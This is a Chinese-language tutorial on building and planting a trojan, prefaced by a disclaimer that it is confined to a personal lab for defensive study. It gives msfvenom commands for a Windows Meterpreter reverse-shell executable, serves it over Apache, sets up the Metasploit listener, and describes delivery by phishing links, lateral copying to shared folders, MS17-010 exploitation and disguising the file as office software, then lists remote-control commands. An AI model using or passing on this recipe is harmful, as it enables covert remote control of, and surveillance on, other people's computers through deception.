木马制作与植入 合规前置说明 全部操作仅在本人自建隔离虚拟机靶场完成设备归本人所有木马生成与植入仅用于安全防御技术自学绝不作用于外网、他人设备私自滥用相关技术造成违法后果自行承担法律责任实验结束将彻底清理所有恶意程序与后门。1、制作⽊⻢病毒Kali Metasploit1⽣成 Windows ⽊⻢程序1 msfconsole # 启动 Metasploit2 #⽣成反向连接⽊⻢reverse_tcp⽬标机主动连接攻击机3 msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.129.128 LPORT9999 -f exe shell.exe参数说明 -p 指定 payload攻击载荷 LHOST 攻击机 IPKali 本机 IP LPORT 攻击机监听端⼝⾃定义如 9999 -f exe ⽣成 EXE 格式⽂件 shell.exe 将⽊⻢保存为 shell.exe2搭建⽂件服务器供⽬标机下载⽊⻢1 #将⽊⻢复制到 Apache ⽹站根⽬录2 mv shell.exe /var/www/html3 #启动 Apache 服务4 service apache2 start验证目标机浏览器访问 http://192.168.129.128/shell.exe 若能下载则说明服务器搭建成功3攻击机开启监听等待⽬标机连接1 msfconsole # 若已启动可跳过 2 use exploit/multi/handler # 加载监听模块 3 set payload windows/meterpreter/reverse_tcp # 与⽊⻢ payload ⼀致 4 set lhost 0.0.0.0 # 监听所有⽹卡 5 set lport 9999 # 与⽊⻢ LPORT ⼀致 6 run # 启动监听2、⽊⻢植⼊与控制1植入方式·社会⼯程学通过邮件附件、聊天⼯具发送⽊⻢下载链接 http://攻击机IP/shell.exe ·内⽹渗透利⽤已控制的设备将⽊⻢复制到⽬标机共享⽂件夹 ·漏洞利⽤通过前⽂提到的 MS17-010 等漏洞将⽊⻢上传到⽬标机2启动木马⽬标机⽤户双击下载的 shell.exe 需诱导⽤户执⾏如伪装为办公软件安装包3控制⽬标机当⽬标机执⾏⽊⻢后攻击机 Metasploit 会显示Meterpreter session 1 opened 表示连接成功 常⽤控制命令同前⽂ Meterpreter 操作 ps 查看进程、 screenshot 截屏、 shell 获取 CMD等